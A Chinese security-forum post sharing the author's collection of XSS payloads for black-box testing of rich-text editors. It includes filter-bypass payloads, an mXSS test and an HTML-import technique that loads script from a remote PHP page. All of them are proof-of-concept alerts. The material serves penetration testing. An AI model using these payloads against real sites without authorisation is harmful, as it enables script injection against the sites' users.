分享些自己平时测试黑盒测试富文本XSS漏洞的payload
全是自己总结的,也不多,但是比较有代表性。先知平台首发!
[code]</textarea>'"><img src=x onerror=alert(1)> 我最优先测试的代码
<a href="�javascript:alert(1)">asd</a> 循环过滤javascript的时候可以用 谷歌适用
<style><img src=\\"</style><img src=x onerror=alert(1);//\\"> 利用标签的优先级解析原理
<a href="javascript:alert(1)">click</a> 过滤了javascript关键字,过滤了冒号
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiaGFjayBieSBweDE2MjQiKTwvc2NyaXB0Pg==> base64的形式 不适用与IE
"><input onfocus=alert(2) autofocus> input标签自动触发
<listing><img src=1 onerror=alert(1) ></listing> mxss的简单测试[/code]
然后关于expression之类的低版本IE下的xss这里就不贴了,姿势太多了。。。
还有些XSS的poc一般上面的没测出来我也会去试试。
[code]AAAA\<p>X<span/\//id="x">xxxx</span><xml/\//id="xxx">xxxx</xml><xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
<embed type="application/x-shockwave-flash" class="edui-faked-video" pluginspage="http://www.macromedia.com/go/getflashplayer" src="javascript:alert(1)" width="22" height="22" align="none" wmode="transparent" play="true" loop="false" menu="false" allowscriptaccess="never" allowfullscreen="true" />
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=10000 /><animate attributeName="xlink:href" values="javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> </a></svg>
<form action="javascript:alert(1)">
<label>有种点我一下 <input type="image" name="isindex" /></label>
</form>
<p>
aaaaaaaaaa
</p>
<isindex action="javascript:alert(1)" type=image>
<embed/src=//xxxxx>aaaa
<embed/src=//xxxxx?[/code]
还有一些常用的,也在时时总结积累中,比如
[code]<link rel=import href=http://xxx/y.php>[/code]
y.php的内容如下[code]<?php
header("Access-Control-Allow-Origin: *");
?>
<script>
alert(location.host);
</script>[/code]这姿势国内的话应该是phith0n在这里首次提出的吧。http://static.hx99.net/static/bugs/wooyun-2015-090279.html
一般我测试富文本就大概测试这么点吧,因为还是应该去一边测一边分析,没必要把一些差不多的payload一个个的去测很多次。
不过其实如果有专门去防御的话,这些代码一般也没啥卵用。所以还是要学习些javascript之类的基础,去具体问题具体分析的比较好。